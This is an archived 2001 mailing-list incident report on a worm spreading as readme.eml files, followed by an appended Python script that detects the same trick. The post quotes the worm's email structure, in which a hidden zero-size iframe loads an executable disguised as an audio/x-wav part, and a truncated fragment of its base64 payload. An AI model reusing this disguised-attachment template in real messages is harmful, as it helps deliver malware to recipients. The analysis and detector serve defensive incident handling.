Security Incidents mailing list archives

RE: New worm? 'readme.eml'


From: Mark Ng <hostmaster () qpp co uk>
Date: Tue, 18 Sep 2001 16:51:00 +0100

I've just seen this infest an NT share.  I've isolated it to one drive (this
machine is a fileserver with no access of its own to the internet.)
Further following behaviour, this worm copies itself into available
directories (I think using a client machine, as this is restricted to one
drive only one department has access to), naming itself the same as other
files in that directory, except as a .eml.  Upon opening in a text editor,
the same content as described below by Pedro appears.
When I connected to the originating server (femm.tdkomm.com.br), I 
saw the normal web page for the institution, plus a pop-up window for 
http://femm.tdkomm.com.br/readme.DONT.eml (without "DONT"), as 
follows:


MIME-Version: 1.0
Content-Type: multipart/related;
type="multipart/alternative";
boundary="====_ABC1234567890DEF_===="
X-Priority: 3
X-MSMail-Priority: Normal
X-Unsent: 1

--====_ABC1234567890DEF_====
Content-Type: multipart/alternative;
boundary="====_ABC0987654321DEF_===="

--====_ABC0987654321DEF_====
Content-Type: text/html;
charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable


<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:EA4DMGBP9p height=3D0 width=3D0>
</iframe></BODY></HTML>
--====_ABC0987654321DEF_====--

--====_ABC1234567890DEF_====
Content-Type: audio/x-wav;
name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <EA4DMGBP9p>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAA
AAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW
4gaW4gRE9TIG1v
ZGUuDQ0KJAAAAAAAAAA11CFvcbVPPHG1TzxxtU88E6pcPHW1TzyZqkU8dbVPPJ
mqSzxytU88cbVO
PBG1TzyZqkQ8fbVPPMmzSTxwtU88UmljaHG1TzwAAAAAAAAAAH8AAAEAAAB/UE
UAAEwBBQB1Oqc7
AAAAAAAAAADgAA4BCwEGAABwAAAAYAAAAAAAALN0AAAAEAAAAIAAAAAAFzYAEA
AAABAAAAQAAAAA
... (worm code follows)

I've inspected the executable code, and it reads like a worm. (doh)

Has anyone seen this?


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
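The quoted readme.eml shows the two things a responder would want a triage script to catch: an HTML part whose zero-sized iframe loads a `cid:` reference, and a part declared as `audio/x-wav` (named readme.exe) whose base64 payload begins with `TVqQ`, i.e. an `MZ` executable header. The following script is an added example, not code from the thread or from either poster; it uses only Python's standard-library `email` module, and the sample message embedded in it is constructed to mirror the quoted structure with made-up boundaries, a made-up Content-ID, and a generic MZ/PE header rather than the worm's bytes. It flags the declared-type versus actual-content mismatch and ties the hidden iframe to the executable part it resolves to.

```python
import email
import re
from email import policy

# Constructed sample modelled on the readme.eml structure quoted in the
# thread: the boundaries, Content-ID and payload bytes are made up here, and
# the base64 is only a generic MZ/PE header, not the worm's code.
SAMPLE_EML = b"""MIME-Version: 1.0
Content-Type: multipart/related; type="multipart/alternative"; boundary="OUTER"
X-Unsent: 1

--OUTER
Content-Type: multipart/alternative; boundary="INNER"

--INNER
Content-Type: text/html; charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

<HTML><HEAD></HEAD><BODY bgColor=3D#ffffff>
<iframe src=3Dcid:PART1 height=3D0 width=3D0>
</iframe></BODY></HTML>
--INNER--

--OUTER
Content-Type: audio/x-wav; name="readme.exe"
Content-Transfer-Encoding: base64
Content-ID: <PART1>

TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
--OUTER--
"""

# Content types under which an MZ (DOS/PE) header is at least honestly declared.
EXECUTABLE_TYPES = {"application/x-msdownload", "application/x-dosexec",
                    "application/octet-stream", "application/exe"}
EXECUTABLE_EXTENSIONS = (".exe", ".dll", ".scr", ".com", ".pif")


def find_hidden_iframe_cids(html):
    """Return the Content-IDs loaded by iframes that have both height and width 0."""
    cids = []
    for tag in re.finditer(r"<iframe\b([^>]*)>", html, re.IGNORECASE):
        attrs = tag.group(1)
        src = re.search(r"""src\s*=\s*["']?cid:([^"'\s>]+)""", attrs, re.IGNORECASE)
        if src is None:
            continue
        zero_h = re.search(r"""\bheight\s*=\s*["']?0\b""", attrs, re.IGNORECASE)
        zero_w = re.search(r"""\bwidth\s*=\s*["']?0\b""", attrs, re.IGNORECASE)
        if zero_h and zero_w:
            cids.append(src.group(1))
    return cids


def analyse_eml(raw):
    """Walk a MIME message and return a list of human-readable findings."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    iframe_cids = set()   # cids pulled in by hidden iframes
    exe_cids = set()      # cids whose decoded body starts with an MZ header
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        payload = part.get_payload(decode=True) or b""   # undoes base64 / quoted-printable
        cid = (part.get("Content-ID") or "").strip().strip("<>")
        if ctype == "text/html":
            html = payload.decode(part.get_content_charset() or "latin-1", errors="replace")
            for ref in find_hidden_iframe_cids(html):
                iframe_cids.add(ref)
                findings.append(f"hidden 0x0 iframe loads cid:{ref}")
            continue
        name = part.get_filename() or ""
        if payload[:2] == b"MZ":
            exe_cids.add(cid)
            if ctype not in EXECUTABLE_TYPES:
                findings.append(f"part cid:{cid} declared {ctype} but starts with MZ (executable)")
        if name.lower().endswith(EXECUTABLE_EXTENSIONS) and not ctype.startswith("application/"):
            findings.append(f"part cid:{cid} named {name!r} but declared {ctype}")
    # The dangerous combination: a hidden iframe whose target is the executable part.
    for ref in sorted(iframe_cids & exe_cids):
        findings.append(f"hidden iframe cid:{ref} resolves to an executable part")
    return findings


def is_suspicious(raw):
    return bool(analyse_eml(raw))


if __name__ == "__main__":
    for line in analyse_eml(SAMPLE_EML):
        print(line)
```

Run against a captured .eml file (read it as bytes and pass it to `analyse_eml`), the script reports the type mismatch even when the attachment is renamed, because it keys on the decoded first bytes rather than on the filename; the filename check is kept as a second, cheaper indicator for messages that are honest about the name but not the type.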

